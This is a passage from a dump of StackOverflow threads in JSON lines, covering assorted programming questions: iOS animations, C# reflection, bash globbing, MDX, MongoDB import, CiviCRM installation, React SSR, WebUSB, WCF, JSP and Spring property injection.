[here](http:\/\/www.devx.com\/wireless\/Article\/42476\/0\/page\/3) and they use `addSubview`.However.Later on, I also found another solution from stackOverFlow at [here](http:\/\/stackoverflow.com\/questions\/3838219\/showing-pushviewcontroller-animation-look-like-presentmodalviewcontroller) and they are all about to animate the transition.Therefore,when I did it, I were getting crash in the middle of the way but I did not have the solution for the error at all\nComment: @ttran I think that first solution is pretty bad (not ARC friendly, not preserving the navigationController stack, etc.), but that second solution is solid. I've updated my answer accordingly with a custom animation, preserving the `pushViewController` invocation. I just tested it and it works fine.\nAnswer: My guess is that you have a <code>UIButton<\/code> that will call your <code>pushToAccount<\/code> method when pressed and that when it is pressed it cannot find that method. It coud be because the method signature does not include an object. So if you change your method from\n<code>- (void)pushToAccount\n<\/code>\nto\n<code>- (void)pushToAccount:(id)sender\n<\/code>\nIt may fix your problem. It is also important to make sure that the object that contains the <code>pushToAccount<\/code> method isn't dealloc'd before that method is called. Perhaps put an <code>NSLog<\/code> message or a breakpoint inside <code>dealloc<\/code> to make sure it isn't called.\nComment: I dont think so because I can navigate to the account view controller after all but get crash at here.\nAnswer: i think use bellow line\n<code>[UIView setAnimationTransition:UIViewAnimationTransitionFlipFromLeft forView:self.window cache:YES];\n<\/code>\ninsted of your bellow line..\n<code>[UIView setAnimationTransition:UIViewAnimationTransitionFlipFromRight forView:self.view cache:NO];\n<\/code>\nhope this help you...\n:)\nand also for animation use bellow code if required....\n<code>CATransition *animation = [CATransition animation];\n [animation setDelegate:self]; \n [animation setType:kCATransitionFromBottom];\n [animation setDuration:1.0];\n [animation setTimingFunction:[CAMediaTimingFunction functionWithName:\n kCAMediaTimingFunctionEaseInEaseOut]];\n [[self.window layer] addAnimation:animation forKey:kAnimationKey];\n<\/code>\nhere use your view insted of window otherwise windows workfine..\n:)\nComment: my account view does not have window property. it is the just view and some controllers on it..\nComment: yes. Instead of doing `[self.view addSubview:controller.view];` i use `[self.navigationController pushViewController: controller animated:NO];` and it works but I dont know why at all\nComment: for animation if you define code in delgate method and then use it then its work fine otherwise use AppDelegate object and then define objAppdelegate.window .... its work\nComment: then try to addsubview exact line of [view commitAnimation] and other codes are above of addsubview line just try.....\n","meta":{"source":"stackoverflow","title":"getting access EXC_BAD_ACCESS when doing animation","dup_signals":{}},"subset":"stackexchange"} +{"text":"Creating Array from type object\n\nQuestion: I am trying to create an array of the type that is known and currently set to <code>Type<\/code>. I have been able to create an <code>IList<\/code> of the type but I am still able to convert that to an array of the type, getting <code>object[]<\/code> instead.\n<code>object propertyValue; \/\/This needs to be an object since it can be set to any object\nType currentType = PropertyInfo.GetType(); \/\/Example: System.String\npropertyValue = GetArray(reader, currentType); \/\/What would this look like to make currentType work?\n\/\/Reflection occuring later to set propertyValue to attribute of String[]\n<\/code>\nHere what I got what working with <code>IList<\/code>, the issue here is not sure how to cast it to an array of <code>currentType<\/code>. I also prefer just getting an array back instead:\n<code>private IList GetArray(Reader reader, Type currentType)\n{\n var returnList = createList(currentType); \n \/\/reader loop that appends to list\n return returnList;\n}\n\npublic IList createList(Type currentType)\n{\n Type genericListType = typeof(List<>).MakeGenericType(currentType);\n return (IList)Activator.CreateInstance(genericListType);\n}\n<\/code>\nComment: I think you would need to `Invoke` the appropriate `ToArray` method.\nComment: For another option, take a look at my answer to https:\/\/stackoverflow.com\/questions\/51679179\/c-sharp-covert-type-into-ienumerable-of-same-type. The second option gets you a reference to a `List` upon which you can call `ToArray()`. However, the underlying List is of the correct type. I don't know of any way to get a correctly typed object reference (`List`), only a reference of type `List`\nComment: I tried to edit my comment, but ran out of time. The code in my answer calls `.ToList()`, but could easily call `ToArray()` instead. Presto, you have an object of type `MyType[]`, however, you can't get a reference to that object that is typed that way; it will be typed `object[]`. I don't know of any way to get a properly typed object reference (aka variable).\nAnswer: Here's an even easier way:\n<code>var stringType = typeof(string);\nvar anArray = System.Array.CreateInstance(stringType, 5);\nvar arrayAsArray = (object[]) anArray;\n<\/code>\nAt that point, the variable <code>anArray<\/code> is typed as an <code>object<\/code>, but refers to an array of 5 strings. The variable <code>arrayAsArray<\/code> is typed as <code>object[]<\/code> and it refers to that same array of strings.\nWhat you can't get (as far as I know) is a variable that it typed <code>MyType[]<\/code> referring to an array of <code>MyType<\/code> instances if all you have is <code>typeof(MyType)<\/code>. The compiler creates typed object references at compile time, you don't get to play in that space.\nOne of the features of the .NET Framework (or flaws, depending on how you look) is that arrays are covariant. There are lots of things that can go bad with array covariance (for example, since the compiler thinks you have an `object[]', it would let you try to add an Elephant instance into your array of strings). However, in this case, it makes your code usable, even if it is somewhat fragile.\nAnswer: It seems you'd like to generate an array of a specified type from a stream of objects. If this is the case then I would approach it like so:\n<code>void Main()\n{\n var file = Path.Combine(\n Environment.GetFolderPath(Environment.SpecialFolder.Desktop),\n \"TestFile.txt\");\n\n var array = GetValues<String>(file).ToArray();\n\n foreach (var item in array)\n {\n Console.WriteLine(item);\n }\n}\n\nprivate IEnumerable<T> GetValues<T>(String file)\n{\n using (StreamReader stream = new StreamReader(file))\n {\n while (true)\n {\n var next = stream.ReadLine();\n if (next == null)\n {\n break;\n }\n yield return (T)Convert.ChangeType(next, typeof(T));\n }\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Creating Array from type object","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bash ls (glob-style)\n\nQuestion: I have an excersise in which I have to print all the file names which are contained in the current folder, which contain in the them one of the letters <code>[a-k]<\/code> and <code>[m-p]<\/code> and <code>[1-9]<\/code> atleast 1 time (each).\nI probably have to use <code>ls<\/code> (glob-style).\nComment: [Don't parse ls](http:\/\/mywiki.wooledge.org\/ParsingLs)\nComment: I'd use `grep` and a regex: `ls -1 | grep -E \"your_regex\"`\nComment: well, I don't know what regex is, and I actually have to use ls I think.. thx\nComment: huh? I have to use ls [glob-style]\nComment: This may help you http:\/\/stackoverflow.com\/q\/14004201\/722238\nComment: this question was originally mine.. xD and no- that doesn't help. Now I'm actually solving this thing with egrep, but not sure how do I write that the string must contain atleast 1 time [a-k] [m-p] [1-9] in reg expressions..\nAnswer: If order is important then you can use globbing:\n<code>$ ls *[a-k]*[m-p]*[1-9]*\najunk404 am1 cn5\n<\/code>\nElse just <code>grep<\/code> for each group separately: \n<code>ls | grep \"[a-k]\" | grep \"[m-p]\" | grep \"[1-9]\"\n1ma\najunk404\nam1\ncn5\nm1a\n<\/code>\nNote: <code>ls<\/code> will show directories if you really only want files use <code>find<\/code> inside:\n<code>find . -maxdepth 1 -type f | grep \"[a-k]\" | grep \"[m-p]\" | grep \"[1-9]\"\n<\/code>\nAnswer: A 100% pure bash (and funny!) possibility:\n<code>#!\/bin\/bash\n\nshopt -s nullglob\na=( *[a-k]* )\nb=(); for i in \"${a[@]}\"; do [[ \"$i\" = *[p-z]* ]] && b+=( \"$i\" ); done\nc=(); for i in \"${b[@]}\"; do [[ \"$i\" = *[1-9]* ]] && c+=( \"$i\" ); done\nprintf \"%s\\n\" \"${c[@]}\"\n<\/code>\nNo external processes whatsoever! No pipes! Only pure bash! 100% safe regarding files with funny symbols in their name (e.g., newlines) (and that's not the case with other methods using <code>ls<\/code>). And if you want to actually see the funny symbols in the file names and have them properly quoted, so as to reuse the output, use\n<code>printf \"%q\\n\" \"${c[@]}\"\n<\/code>\nin place of the last <code>printf<\/code> statement.\nNote. The patterns <code>[a-k]<\/code>, <code>[p-z]<\/code> are locale-dependent. You might want to set <code>LC_ALL=C<\/code> to be sure that <code>[a-k]<\/code> really means <code>[abcdefghijk]<\/code> and not something else, e.g., <code>[aAbBcCdDeEfFgGhHiIjJk]<\/code>.\nHope this helps!\nAnswer: If order isn't important, and the letters appear once or more, you can use chained greps.\n<code>ls | egrep \"[a-k]\" | egrep \"[m-p]\" | egrep \"[1-9]\"\n<\/code>\nIf order matters, then just use a glob pattern\n<code>ls *[a-k]*[m-p]*[1-9]*\n<\/code>\nAnswer: To be complete, you need to search all the combinations:\n<code>ls *[a-k]*[m-p]*[1-9]* *[a-k]*[1-9]*[m-p]* \\\n *[m-p]*[a-k]*[1-9]* *[m-p]*[1-9]*[a-k]* \\\n *[1-9]*[m-p]*[a-k]* *[1-9]*[a-k]*[m-p]*\n<\/code>\n","meta":{"source":"stackoverflow","title":"Bash ls (glob-style)","dup_signals":{}},"subset":"stackexchange"} +{"text":"MDX: Calculating MONTH COVER (of Stock) in a performant way\n\nQuestion: this is my dataset:\n\nI want to calculate the \"Cover Month\". Therefore I have to look for Stock(in this example in january 2016 = 5,000), then have a look for each future month if current stock(january 2016) is bigger than \"cum. Sales\" of following month. If yes, then remember value = 1. This should be done for each future month. After this step all remembered values should be added, so result is 4 (Cover Month). Stock will be enough for 4 following months.\nNext step system should do this for next month - dynamically for each month...\nHow can I do this in a performant way?\nIs this the right way:\n<code>Filter([TIME].[Year to Month].currentmember : NULL,\n[Measures].[cum Sales] < [Measures].[Stock])\n<\/code>\n?\nMaybe anybody can give me a hint? Or maybe I need another alternative formula to get a subtotal and then do another calculation?\nThanks in advance, Andy\nComment: why does it show 1 for May-16? The cum total is 5700 which is greater than 5000.\nComment: did my answer help or can I delete it?\nAnswer: If you just require a 1 or 0 then can things not be simplified:\n<code>IIF(\n SUM(\n {[TIME].[Year to Month].currentmember : NULL},\n [Measures].[cum Sales]\n ) \n < ([Measures].[Stock],[TIME].[Year to Month].&[Jan-2016]) \/\/<<amend to the date format used in your cube\n,1\n,NULL\n)\n<\/code>\n","meta":{"source":"stackoverflow","title":"MDX: Calculating MONTH COVER (of Stock) in a performant way","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to insert thousands of JSON Array Dumps in Mongodb quickly?\n\nQuestion: I have around 20,000 files with JSON array in them. I would like to DUMP all these files into MongoDB hosted locally. I am using mongoimport for this purpose.\nIs there any way I can speed up the process ?\nThese 20,000 files contains around 12 million records.\nComment: if you have 20,000 json files and 12 million records it sounds like you can't just go json->mongo.. should use something like JAVA or another language that you can do an insert with. It's not going to be a 1-2min job though..\nComment: What do you define as \"quickly\"? There is no real quick way to insert 12 million records.\nAnswer: My Mongo version is 2.6.12 in a linux server with 32 cores. I have imported 134 millions of records into MongoDB. The amount of input files is around 1700 and the format is JSON array. My testing results are as follows:\n\nmongoimport: 100K records a time. Import 100K records in 4min 50s.(Before Mongo version 3.0.0, there is no \"--numInsertionWorkers\" parameters, so I conduct single-threaded import. You can try with that parameter if newer version is available.)\nmongoimport: 50K records a time. Import 100K records in 2min 20s.\nPyMongo (single-threaded): a records a time, use insert method. Import 100K records in 30s.\nPyMongo (multi-threaded, thread number is 8): a record a time. Import 134 millions of records in 1hour 32min. It's nearly linear speedup.\n\nThe reason possibly falls in: A file with 100K records is a large chunk which is time-consuming for \"mongoimport\" to handle. I haven't figured out why PyMongo is faster than mongoimport. Are JSON files processed faster? So, you could probably try with PyMongo in a multi-threaded way.\n","meta":{"source":"stackoverflow","title":"How to insert thousands of JSON Array Dumps in Mongodb quickly?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Joomla installation error: Please enter a package folder. Unable to find install package\n\nQuestion: When I tried installing by uploading the package file, nothing happened. Then I tried exactly as the installation guide says for Joomla and I get this error:\nPlease enter a package folder.\nUnable to find install package\nThis is a new Joomla installation 3.8.5, I am trying to install CiviCRM 4.7.31. I have PHP 5.6. I'm hosted on a shared server so not sure how to check the PHP extensions and configuration or the MySQL version with my cPanel.\nI have never used CiviCRM before but I have been using Joomla for years and never got that error with any installation packages.\nI would love some help and am looking forward to your support. \nComment: If you want, please contact me throught the contact form from vicaroh.com and send me the url\/path to the site , in order to check if it is ok...\nAnother trouble can be the memory limit, https:\/\/docs.civicrm.org\/sysadmin\/en\/latest\/requirements\/\nplease, check it, and pleased to keep informed!\nFrancesc\nAnswer: First of all, my apologizes for my english, it is not very fluent.\nNow, my answer: \nHave you checked if this version of CiviCRM is compatible with your host PHP version?\nCiviCRM package is not an Autoinstaller Package as many other extensions: components or plugins.\nI think the process to install is:\n-Upload the compressed CIVICRM package (Check than is a Joomla version) to the 'tmp' folder of your Joomnla installation. Uncompress-Expand it.\n-Now, in your tmp folder there must contains a folder 'com_civicrm\/\nIn administrator\/extensions\/install-uninstall\/install from directory add the \/com_civicrm\/ subfolder at the end and click install.\nIf everything goes right you will get a 'component successfully installed'.\nThe link to Civicrm help : https:\/\/docs.civicrm.org\/sysadmin\/en\/latest\/install\/joomla\/\nGood Luck!\nFrancesc\nComment: Hi Francesc, Thanks for your answer, I actually checked everything and as described in my post, I did the extact procedure described in the CiviCRM joomla installation help. And it didn't work. That's why I asked for help. I really don't see why it wouldn't work and need some more help. Thank you for your further support.\nAnswer: in order to check\/know what versions of php, SQL engine, etc. you can see it at Joomla BAckend, System, System information (last menu item). You will get information about many parameters.\nHave you checked by FTP if the uncompressed folder of com_civicrm exists before going on the installation step via joomla installer?. If you clean the Cach\u00e9, the system deletes the contentsd from the folder \/tmp\/\nAlso, maybe the hosting have any limitations? Have you tried to install in local?(For example with Xammp-bitnamy)\nFrancesc\nComment: Hello and thanks for keeping with me.\nphp version: 5.6.32. \nYes FTP is fine and the folder is uncompressed and located exactly where it is supposed to be. I have not cleared the cache since and my hosting doesn't have limitations, I have a huge pack. I don't install anything in local though. I don't know how this works and have never done it before, I usually have a sandbox DB for tests and the live site. I'm using a brand new sandbox now for this test.\n","meta":{"source":"civicrm.stackexchange","title":"Joomla installation error: Please enter a package folder. Unable to find install package","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get real type of file that user want to upload\n\nQuestion: in my ASP.Net MVC 3 application I have uploading images logic. How can I find out is some file that user try to upload realy an image? I need to check it before uploading , on client side\nComment: Check *what*? You haven't provided a valid criteria.\nAnswer: If you use:\n<code>Image.FromStream(stream)\n<\/code>\nit will throw an ArgumentException if it is not a valid image.\nComment: I see, so how about using the file extension? Not perfect but in combination with a server check it would cover all cases, and cover most on the client side. e.g. http:\/\/blog.navayan.com\/jquery-validation-for-file-type-extension\/\nComment: I need to check it before uploading , on client side\n","meta":{"source":"stackoverflow","title":"Get real type of file that user want to upload","dup_signals":{}},"subset":"stackexchange"} +{"text":"React SSR blinks page\n\nQuestion: I created a project with React, react-router, @loadable\/component.\nNow I'm trying to add SSR to this project. \nI did server side rendering with react-router.\nAnd then I added @loadable\/component to import all pages component:\n<code>import loadable from '@loadable\/component';\n\nconst routersConfig = [\n {\n path: '\/',\n component: loadable(() => import('.\/Home')),\n exact: true,\n },\n {\n path: '\/2',\n component: loadable(() => import('.\/Home2')),\n exact: true,\n },\n];\n<\/code>\nThen I added all this parts of code: https:\/\/www.smooth-code.com\/open-source\/loadable-components\/docs\/server-side-rendering\/\nAnd now it works. \nBut It works with the problem: a content blinks while loading.\nHow I understand the page's loading process:\n\nBrowser gets a content generated by SSR (the first query in network tab)\nBrowser renders a content (with left and top margins )\nBrowser downloads two enterpoints and vendors from html (app.js, normalizer.js, vendor.js)\nBrowser executes app.js and normalizer.js. Left and top margins are removed. \nApp.js starts downloading page's chunk - home.js. In this moment content disappears \nWhen home.js is downloaded, the content appears again.\n\nI shoot a video to illustrate this process. (I'm sorry for quality, stackoverflow forbides files which size is more then 2MB ). I'm throttling network speed to imagine all page's download process.\n\nMy question is why the content disappears? How to fix it?\nMy code\nserver.js\n<code>const sheetStyledComponents = new ServerStyleSheet();\n const sheetsJssRegistry = createSheetsRegistry();\n const statsFile = path.resolve(process.cwd(), '.\/build-ssr\/dist\/loadable-stats.json');\n\n const extractor = new ChunkExtractor({\n statsFile,\n entrypoints: [\n 'app',\n 'normalize',\n ],\n });\n\n try {\n const client = ApolloSSRClient();\n\n const tree = (\n <ApolloProvider client={client}>\n <ApplyTheme sheetsRegistry={sheetsJssRegistry}>\n <StaticRouter location={req.url}>\n <Home \/>\n <\/StaticRouter>\n <\/ApplyTheme>\n <\/ApolloProvider>\n );\n\n\/\/ there is combination of Apollo graphql, jss, styledComponent functions\n const body = await getMarkupFromTree({\n renderFunction: flow(\n sheetStyledComponents.collectStyles.bind(sheetStyledComponents),\n extractor.collectChunks.bind(extractor),\n renderToString\n ),\n tree,\n });\n\n const scriptTags = extractor.getScriptTags(); \n \/\/ It isn't used yet\n const linkTags = extractor.getLinkTags(); \n\n const styleTags = sheetStyledComponents.getStyleTags();\n\n const html = (await rawHtml)\n .replace(\n '<\/head>',\n ` \n ${styleTags}\n <style type=\"text\/css\" id='jss-server-side-styles'>\n ${sheetsJssRegistry.toString()}\n <\/style>\n <script>\n window.__APOLLO_STATE__ = ${JSON.stringify(client.extract())};\n <\/script>\n ${scriptTags}\n <\/head>\n `\n )\n .replace('<div id=\"app\"><\/div>', `<div id=\"app\">${body}<\/div>`);\n\n res.send(html);\n<\/code>\nindex.jsx\n<code>const SSRApp = (\n <ApolloProvider client={ApolloClient}>\n <ApplyTheme>\n <BrowserRouter>\n <App \/>\n <\/BrowserRouter>\n <\/ApplyTheme>\n <\/ApolloProvider>\n);\n\nloadableReady(() => (\n ReactDOM.hydrate(\n SSRApp,\n document.getElementById('app'),\n )\n));\n<\/code>\nComment: As far as I can understand your js code reap out everything inside ``and render it from scratch. In theory your js shouldn't do that it should connects to existed components inside that ``\nComment: I believe your entire web page is blinking because the entire page is wrapped within which changes the content when you navigate to another page. If you want the header to not blink, you need to move the Header outside of your component. Try that and let me know the results. I am interested in your setup.\nComment: @JoshuaBlevins I have found error. It's just trying to render SSR instead of . You can see it in my code.\nComment: Can we see your component as well as the code where you are using ReactDOM? I think that might help a bit more.\nComment: After reading the documentation on react-router's github repo, we really need to see where your Router is defined, as well as how it is defined.\nComment: @JoshuaBlevins thank you for answer. I have added some code\nComment: @Arseniy-II I think so. But why does my code do this?)\nComment: That makes sense. I am glad that you figured everything out.\nAnswer: It was my fault.\nThe hydration version of app contained BrowserRouter -> Switch -> Router -> HomePage\nAnd the SSR version contained only StaticRouter -> HomePage\nBecause of this, after rendering SSR version, react removed all DOM and created new one with Router.\nComment: i really need help about the blink too. and i'm not doing anything like this.but still it blinks .\nComment: @Oleg I am still confused. what did you define for `location` in client side?\nAnswer: i changed in server.js. its worked for me\nyours maybe (server\/index.js or server.js or server\/app.js..etc) \n<code>import Express from 'express';\nimport Loadable from 'react-loadable';\n\n\/\/ from \/\/\n\n app.listen(3000, () => {\n console.log('app now listening on port', port);\n });\n\n\/\/ to \/\/\n\n import Loadable from 'react-loadable';\n\n Loadable.preloadAll().then(() => {\n app.listen(port, () => {\n console.log('app now listening on port', port);\n });\n });\n<\/code>\nfor more config understanding you can see\nThe first step to rendering the correct content from the server is to make sure that all of your loadable components are already loaded when you go to render them.\nTo do this, you can use the Loadable.preloadAll method. It returns a promise that will resolve when all your loadable components are ready.\nComment: loadable component. doesnt have anything like that but i'm facing the blink . there is nothing to wrap `app.listen` in loadable components either.\n","meta":{"source":"stackoverflow","title":"React SSR blinks page","dup_signals":{}},"subset":"stackexchange"} +{"text":"AutoResetEvent Set called after timeout\n\nQuestion: From MSDN \"If there are no waiting threads, the wait handle remains signaled until a thread attempts to wait on it, or until its <code>Reset<\/code> method is called.\"\n<code>EventWaitHandle MyWaitHandle = new AutoResetEvent(false);\n<\/code>\nThread # 1:\n<code>public void Method1()\n{\n \/\/do something\n \/\/wait for the signal or timeout\n MyWaitHandle.WaitOne(10000);\n \/\/do something else on receiving signal or after timeout\n}\n<\/code>\nThread # 2:\n<code>\/\/this would be called when there is a response from the external app\npublic void Method2()\n{\n \/\/do something\n \/\/send the signal to waiting thread\n MyWaitHandle.Set();\n}\n<\/code>\nIn my application Thread # 1 is submitting a request to external app and waiting for a signal or timeout. If a response is received from the external app Thread # 2 sets the wait handle. This <code>set<\/code> can be called even after the timeout. My questions are \n1) It is highly possible that <code>Method2<\/code> can be called after the timeout resulting in setting the signal. Does that mean whenever there is a request to Thread # 1 in the future, the <code>WaitOne(10000)<\/code> has no effect and will be released immediately?\n2) Is there anyway for me to not call <code>set<\/code> in <code>Method2<\/code> in case of timeout? Would that cause any problems to the Thread # 1?\nComment: Why would you not want to set the event even after a timeout? Does Method2 not signal that something is ready for Method1? Perhaps if you explain what you're trying to accomplish...\nComment: `Method2()` would not know if it is being called after timeout. There lies the issue. Well, I can monitor the time and set a `bool` variable to find out if it is timedout. But Can I call the `Set()` based on a `bool` value. If I don't call would it leave any open handles or anything?\nAnswer: Why not just make sure the wait handle is always reset before waiting on it?\n<code>public void Method1()\n{\n \/\/ Reset the wait handle I'll be using...\n MyWaitHandle.Reset();\n\n \/\/do something\n \/\/wait for the signal or timeout\n MyWaitHandle.WaitOne(10000);\n \/\/do something else on receiving signal or after timeout\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"AutoResetEvent Set called after timeout","dup_signals":{}},"subset":"stackexchange"} +{"text":"Accessing WebUSB of Chrome through AngularJS\n\nQuestion: I am having an issue while using WebUSB APIs for chrome through angularJS. This is a project where I need to access an esc\/pos thermal printer for printing invoice.\nIn normal javascript:\nHTML:\n<code><button id=\"connect\">Connect<\/button>\n<\/code>\nJavascript:\n<code>document.addEventListener('DOMContentLoaded', async () => {\n try{\n let devices = await navigator.usb.getDevices({\n filters: [{\n vendorId: VENDOR_ID,\n productId: PRODUCT_ID\n }]\n });\n let button = document.getElementById('connect');\n\n button.addEventListener('click', async () => {\n if (devices.length === 0) {\n\n var device;\n let devices = [];\n\n try {\n device = await navigator.usb.requestDevice({\n filters: [{\n vendorId: VENDOR_ID,\n productId: PRODUCT_ID\n }]\n });\n }\n catch (error) {\n console.log(error)\n }\n }\n else {\n device = devices[0];\n }\n console.log('open');\n await device.open();\n console.log('opened:', device);\n await device.selectConfiguration(1); \/\/ Select configuration #1 for the device.\n await device.claimInterface(0); \/\/ Request exclusive control over interface #0.\n console.log(await device.transferOut(2,buffer));\n })\n\n }\n catch (error) {\n console.log(error)\n }\n<\/code>\nin angularjs:\nHTML:\n<code><button class=\"btn btn-warning\" ng-init=\"newinvscopetest.bindPrint()\" id=\"print\">Print<\/button>\n<\/code>\ncontroller:\n<code>newinvscopetest.bindPrint = function (){\n let button = document.getElementById('print');\n\n button.addEventListener('click', async () => {\n let device;\n let devices = [];\n const VENDOR_ID = 0x0FE6;\n const PRODUCT_ID = 0x811E;\n try {\n devices = await navigator.usb.getDevices({\n filters: [{\n vendorId: VENDOR_ID,\n productId: PRODUCT_ID\n }]\n });\n if (devices.length === 0) {\n try {\n device = await navigator.usb.requestDevice({\n filters: [{\n vendorId: VENDOR_ID,\n productId: PRODUCT_ID\n }]\n });\n }\n catch (error) {\n console.log(error)\n }\n }\n else {\n device = devices[0];\n }\n console.log('open');\n await device.open();\n console.log('opened:', device);\n await device.selectConfiguration(1); \/\/ Select configuration #1 for the device.\n await device.claimInterface(0); \/\/ Request exclusive control over interface #0.\n let buffer = newinvscopetest.getPrintData();\n console.log(await device.transferOut(2,buffer));\n }\n catch (error) {\n console.log(error)\n }\n });\n };\n<\/code>\nWhile trying with the angular script a DOMException is throwing an error : \n\nMust be handling a user gesture to show a permission request.\n\nThis is required by web usb's requestDevice function, which is supposed to be a user button click or mouse hover.\nAnd this is working fine in the first example because the user is clicking the button to trigger the function.\nIn the 2nd example, the same thing is happening. I even avoided ng-click to have native event listener to try if that work. But no luck with that too. \nCan anyone help me? What is going wrong in angularJS?\nAnswer: I'm not sure about the first example but in the second example, before calling <code>requestDevice()<\/code> you await the promise returned by <code>getDevices()<\/code>. This means that the rest of your async function is called after this promise is resolved and your code no longer has a user gesture.\nInstead of calling <code>getDevices()<\/code> on every click I recommend calling it only once on page load and using an event listener (added with <code>navigator.usb.addEventListener('connect', ...)<\/code>) to detect a device connected after the page load.\nComment: Thanks for the confirmation. I was thinking the same thing. I will test this soon. But tell me one thing. If I use ng-click instead of addEventListener for the button press, will it still be user gesture?\nComment: It should be the same. If it isn't that sounds like a bug in Angular.\n","meta":{"source":"stackoverflow","title":"Accessing WebUSB of Chrome through AngularJS","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to add numbers in link (loop)\n\nQuestion: I'm writing a script where I try to scrape data from json files. The website link structure looks like this:\n\nhttps:\/\/go.lime-go.com\/395012\/Organization\/pase1009\/\n\nI want the Python script to go through a certain number and try to visit them. For example, right now the link is at pase1009. After the script has visited this link I want it to go to pase1010 and so on.\nI'm really new to Python and trying to learn how to use loops, count, etc. but don't get it.\nMy PY code:\n<code> rlista = \"https:\/\/go.lime-go.com\/395012\/Organization\/pase1009\/getEmployees\"\n page = self.driver.get(rlista)\n time.sleep(2)\n<\/code>\nBest regards,\nTobias\nComment: Thats quite basic stuff, you should consider reading some tutorials (google for python loop)\nAnswer: You can combine several strings to one with the <code>+<\/code>-operator.\nSo you could save your base link in a variable and add the number afterwards in the loop.\nWould look something like this:\n<code>baseLink = \"https:\/\/your-link.com\/any\/further\/stuff\/pase\"\n\nfor k in range(1000,1010,2):\n link = baseLink + str(k)\n print(link)\n<\/code>\nThere your links would be\n\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1000\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1002\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1004\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1006\nhttps:\/\/your-link.com\/any\/further\/stuff\/pase1008\n\nas k will start with 1000, increment by 2 and stop before 1010 (<code>range(start, stop, increment)<\/code>).\n","meta":{"source":"stackoverflow","title":"How to add numbers in link (loop)","dup_signals":{}},"subset":"stackexchange"} +{"text":"WCF Streamed\/chunked upload?\n\nQuestion: I would like to add uploading files to my WCF REST web service, but I don't want an entire file to be uploaded - only 16kb portions of the file at every 256kb need to be uploaded.\nSo the user of the REST service doesn't have to faff around doing this, is it possible for a WCF service to only recieve certain portions WITHOUT uploading the entire file first, then picking out the bits needed?\nAnswer: WCF does not do much when it comes to uploading a file. It receives a stream, which it then processes. It would be the client that would have to determine which parts of the file to send out on the stream. Some of the newer web API's being designed alongside HTML 5 might be able to provide some support for this... In the mean time, I know there are several Flash based file uploaders that are able to provide much richer, streaming file uploading. It might be possible to use Silverlight in a similar way to cherry-pick chunks of your client files, and send those chunks to the listening WCF service.\nRegardless of what client-side technology you use, the choice of which file parts to send to the WCF service would have to be done at the client.\n","meta":{"source":"stackoverflow","title":"WCF Streamed\/chunked upload?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Result redirection not working with jsp\n\nQuestion: I'm getting a ping result in my servlet.I'm trying to redirect it to another jsp file.\nthe jsp file for output opens.But nothing shows in it.\nThis is my servlet main code \n<code>protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n \/\/ TODO Auto-generated method stub\n String ip = request.getParameter(\"ip\"); \n response.setContentType(\"text\/html\");\n PrintWriter out = response.getWriter();\n \/\/ out.println(\"The ip address is:\"+ip+\"\\n\");\n String result = pingTest(ip);\n out.println(result);\n String redirect = \"Output.jsp\";\n RequestDispatcher view = request.getRequestDispatcher(redirect);\/\/Is it good approach to redirect request in ajax based servlet?\n view.forward(request, response);\n } \n<\/code>\nThis is my output.jsp page\n<code><%@ page language=\"java\" contentType=\"text\/html; charset=UTF-8\"\n pageEncoding=\"UTF-8\"%>\n<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\">\n<title>Ping Check Result<\/title>\n<\/head>\n<body>\n<\/body>\n<\/html\n<\/code>\nDo I need to add anything in output.jsp?\nComment: Well, there is nothing in the body of your JSP. So why should it display anything? Also, what you're doing is forwarding, (which is fine), but not redirecting, which is a completely different thing.\nAnswer: In your servlet:\n<code>request.setAttribute(\"result\", result);\nrequest.getRequestDispatcher(\"\/WEB-INF\/Output.jsp\").forward(request, response);\n<\/code>\nIn your JSP:\n<code><pre>The data from servlet: ${result}<\/pre>\n<\/code>\nAnswer: your servlet must be :\n<code> protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n\n String ip = request.getParameter(\"ip\"); \n response.setContentType(\"text\/html\");\n PrintWriter out = response.getWriter();\n out.println(\"The ip address is:\"+ip+\"\\n\");\n String result = pingTest(ip);\n out.println(result); \n RequestDispatcher view = request.getRequestDispatcher();\n view.forward(request, response);\n }\n<\/code>\n","meta":{"source":"stackoverflow","title":"Result redirection not working with jsp","dup_signals":{}},"subset":"stackexchange"} +{"text":"Spring Inject boolean value from property file using XML is always false\n\nQuestion: I am trying to inject boolean property from property file. the value of the attribute is alway <code>false<\/code>\nthe property \n<code>use.virtual.wallet=true\n<\/code>\nThe xml configuration\n<code><bean id=\"proxyUtil\" class=\"com.util.ProxyServiceUtility\">\n <property name=\"useVirtualWallet\" value=\"${use.virtual.wallet}\" \/>\n<\/bean>\n<\/code>\nthe bean\n<code>public class ProxyServiceUtility {\n\n private boolean useVirtualWallet;\n\n public void setUseVirtualWallet(boolean useVirtualWallet) {\n this.useVirtualWallet = useVirtualWallet;\n }\n\n public boolean isUseVirtualWallet() {\n return useVirtualWallet;\n }\n}\n<\/code>\n<code>useVirtualWallet<\/code> is alway false\nAnswer: You have to load your properties file into Spring context using PropertyPlaceholderConfigurer.\n<code><bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n <property name=\"locations\" value=\"classpath:com\/foo\/jdbc.properties\"\/>\n<\/bean>\n<\/code>\nComment: I already do that, and i have a lot of other properties loaded correctly, the only problem is regarding the boolean one\nAnswer: The problem fixed using this workaround, instead of injecting <code>boolean<\/code>, I injected <code>String<\/code> and then converted that <code>String<\/code> to <code>boolean<\/code> on the setter \n<code>public void setUseVirtualWallet(String useVirtualWallet) {\n this.useVirtualWallet = Boolean.parseBoolean(useVirtualWallet);\n}\n<\/code>\nAnswer: Another variant\n<code><beans \n 